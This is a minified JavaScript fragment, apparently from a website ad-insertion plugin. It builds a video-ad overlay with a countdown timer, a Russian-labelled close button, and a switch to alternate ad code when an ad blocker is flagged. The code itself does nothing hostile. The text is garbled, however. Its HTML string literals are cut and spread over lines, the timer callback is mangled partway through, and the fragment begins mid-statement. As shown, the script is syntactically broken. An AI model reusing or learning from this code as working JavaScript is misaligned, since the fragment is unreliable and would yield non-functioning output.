l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};